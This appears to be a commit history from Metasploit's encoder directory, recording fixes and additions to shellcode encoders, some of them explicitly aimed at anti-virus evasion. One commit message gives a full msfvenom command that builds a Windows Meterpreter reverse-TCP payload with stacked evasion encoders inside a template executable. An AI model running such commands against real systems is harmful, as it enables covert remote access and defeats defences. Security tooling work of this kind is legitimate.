Commit Graph

240 Commits (e1735078692f4f67701a7c96e25e477b39bf9700)

Author SHA1 Message Date
Brendan Coles 5957315167
Land #11141, Ensure Byte XORi Encoder uses cacheflush() 2018-12-29 10:20:07 +00:00
Pedro Ribeiro 1e88ce9a3d
Edit the comments to -84 2018-12-18 16:33:44 +00:00
Pedro Ribeiro 05218654f4
adjust the offset to -84 2018-12-18 16:30:47 +00:00
Pedro Ribeiro af418ec7f7
Fix mipsle byte_xori too 2018-12-18 16:05:23 +00:00
Pedro Ribeiro d40d6c4e3d
Update longxor.rb
Suffers from the same problem as the mipsbe version
2018-12-18 15:48:29 +00:00
Pedro Ribeiro 34c9555717
Fix byte_xori encoder
The byte_xori encoder for mipsbe does not work correctly. At the end of the decoding, it should invoke cacheflush() with the correct parameters:
int cacheflush(char *addr, int nbytes, int cache)

I think this is because the encoder is based of the longxori encoder, which itself is pretty old (2008), and before kernel 2.6.11, cacheflush() did not need any parameters (from the cacheflush man page):
BUGS
Linux kernels older than version 2.6.11 ignore the addr and nbytes arguments, making this function fairly expensive. Therefore, the whole cache is always flushed.

This commit fixes that by setting up the parameters correctly. As an unfortunate side effect this increases the shellcode by 16 bytes, but it is absolutely necessary for it to work properly.

Note that this bug is not present when testing the encoder output on an emulator like qemu; emulators do not need to flush the caches to work properly.
2018-12-18 15:37:47 +00:00
Pedro Ribeiro 86cbddf46d
fix spacing 2018-12-18 13:35:16 +00:00
Pedro Ribeiro fff850a07e
Make longxor encoder great again
The longxor encoder for mipsbe does not work correctly. At the end of the decoding, it should invoke cacheflush() with the correct parameters:
int cacheflush(char *addr, int nbytes, int cache)

The encoder previously did not setup the arguments, as it even said so in the comments:
;       addiu   $4, $16, -4       ; not checked by Linux
;       li      $5,40                   ; not checked by Linux
;       li      $6,3                    ; $6 is set above

I think this is because the encoder is pretty old (2008), and before kernel 2.6.11, cacheflush() did not need any parameters (from the cacheflush man page):
BUGS
       Linux  kernels older than version 2.6.11 ignore the addr and nbytes arguments, making this function fairly expensive.  Therefore, the
       whole cache is always flushed.

This commit fixes that by setting up the parameters correctly. As an unfortunate side effect this increases the shellcode by 16 bytes, but it is absolutely necessary for it to work properly. 

Note that this bug is not present when testing the encoder output on an emulator like qemu; emulators do not need to flush the caches to work properly.

As an added bonus I have also made it compatible with toupper() restrictions, which is common in web server exploits too. This did not add any extra bytes to the encoder.
2018-12-18 12:30:55 +00:00
Francesco Soncina 6237740116
lint: remove spaces 2018-12-15 01:02:13 +01:00
Francesco Soncina ff2d048530
fixes: update x86/xor_dynamic for #11100 2018-12-10 22:45:45 +01:00
Francesco Soncina a94e52ca31
fixes: updates x64/xor_dynamic for #11100 2018-12-10 22:42:31 +01:00
bwatters-r7 08ec8e1ef9
Land #10553, add x86/xor_dynamic and x64/xor_dynamic encoders
Merge branch 'land-10553' into upstream-master
2018-10-30 09:56:15 -05:00
stefano118 2ba53143f1
refactor: optimized stub
refactor: optimized stub

refactor: optimized stub
2018-09-01 03:17:17 +02:00
stefano118 6c1a83d464
refactor: snake case 2018-09-01 03:17:17 +02:00
stefano118 27d7d17deb
refactor: beautify stub
refactor: beautify stub

refactor: beautify stub

refactor: beautify stub
2018-09-01 03:17:16 +02:00
phra 6b32bdbba9
feat: add x86 xor_dynamic encoder 2018-09-01 03:17:16 +02:00
phra 3b04e8e569
feat: add x64 xor_dynamic encoder 2018-09-01 03:17:15 +02:00
stefano118 93e9253aeb
Update countdown.rb 2018-09-01 02:40:26 +02:00
phra a282d2a8b1
fix: rescue rex runtime errors in x86/nonalpha 2018-08-30 01:22:24 +02:00
phra 2616472025
fix: rescue rex runtime errors in x86/countdown 2018-08-30 01:22:24 +02:00
William Vu 4ff2c1dbe8 Add brace expansion encoder 2018-08-23 21:33:43 -05:00
William Vu eeea3356ae Update ${IFS} encoder 2018-08-23 21:33:42 -05:00
William Vu 88bbc50104 Utilize uniq to make char array more readable
Hat tip @bcoles.
2018-07-12 17:59:12 -05:00
William Vu 1f0535618d Document bareword string deprecation in php/base64 2018-07-12 13:29:33 -05:00
William Vu 378930e5f4 Prefer %w array over quoted array in php/base64
irb(main):001:0> ["(",")",".","_","c","h","r","e","v","a","l","b","s","6","4","d","o"] == %w{( ) . _ c h r e v a l b s 6 4 d o}
=> true
irb(main):002:0>
2018-07-12 13:29:33 -05:00
Robin Stenvi c81ad8fec0 Changes after review 2018-04-24 18:33:27 +02:00
Robin Stenvi 60c6f970c1 Added base64 encoder for Ruby 2018-04-21 10:54:26 +02:00
h00die a40429158f 40% done 2017-08-28 20:17:58 -04:00
Brent Cook 6300758c46 use https for metaploit.com links 2017-07-24 06:26:21 -07:00
g0tmi1k b8d80d87f1 Remove last newline after class - Make @wvu-r7 happy 2017-07-19 11:19:49 +01:00
g0tmi1k 4720d1a31e OCD fixes - Spaces 2017-07-14 08:46:59 +01:00
g0tmi1k fd843f364b Removed extra lines 2017-07-14 08:17:16 +01:00
g0tmi1k 424522147e OCD fixes - Start of *.rb files 2017-07-13 23:53:59 +01:00
William Vu 64452de06d Fix msf/core and self.class msftidy warnings
Also fixed rex requires.
2017-05-03 15:44:51 -05:00
Christian Mehlmauer 0a398a59c5
change description 2017-03-30 20:06:23 +02:00
Brent Cook 8995629037
Land #7061, allow chaining the service stub with other encoders 2017-03-15 13:56:09 -05:00
OJ 1d617ae389
Implement first pass of architecture/platform refactor 2016-10-28 07:16:05 +10:00
David Maloney 3f9540d906
fix trailing whitespace
this commit got dropped during landing
2016-09-30 14:30:31 -05:00
fullmetalcache fd1efaea9f Attempts to address issue #6963 x64/xor encoder not working 2016-08-29 19:59:39 -06:00
James Lee 556620d981
Fix pack on big endian host systems 2016-07-12 15:17:52 -05:00
James Lee e9350986a4
Style 2016-07-12 14:51:37 -05:00
James Lee 1a15fc1c2e
Whitespace 2016-07-12 14:51:37 -05:00
agix 7d638a0975 Remove misc_anti_emu 2016-07-05 17:29:37 +02:00
agix 3edb0b3625 Reduce chance to get a null byte in the decoder stub 2016-06-30 19:14:32 +02:00
agix 31ea58d7f0 Inherit from Msf::Encoder::Xor to get key preventing badchars
I guess it what Msf::Encoder::Xor find_bad_keys is for.
2016-06-30 18:29:30 +02:00
agix 8a777bec41 Forget to rename function after msftidy correction 2016-06-29 23:30:48 +02:00
agix c489c5ce3e Add two x64 encoders to improve anti-virus evasion 2016-06-29 23:11:24 +02:00
agix 9bb5577320 Forget to push the fix for msftidy... 2016-06-23 15:23:40 +02:00
agix 378208bc3d Move service stub in x86 encoder to be easily used.
Add psexec option SERCVICE_STUB_ENCODER to allow a list of encoder to
encode the x86/service stub.
Add multiple_encode_payload function in payload_generator.rb to accept a
list of encoder (beginning with @ to not break the classic parsing of
encoder).
With this it would be possible to pass multiple encoder to msfvenom in
one execution.
./msfvenom -p windows/meterpreter/reverse_tcp LPORT=80
LHOST=192.168.100.11 -e
@x86/shikata_ga_nai,x86/misc_anti_emu:5,x86/shikata_ga_nai -x
template.exe -f exe-only -o meterpreter.exe
2016-06-23 14:56:03 +02:00
James Lee 1375600780
Land #6644, datastore validation on assignment 2016-03-17 11:16:12 -05:00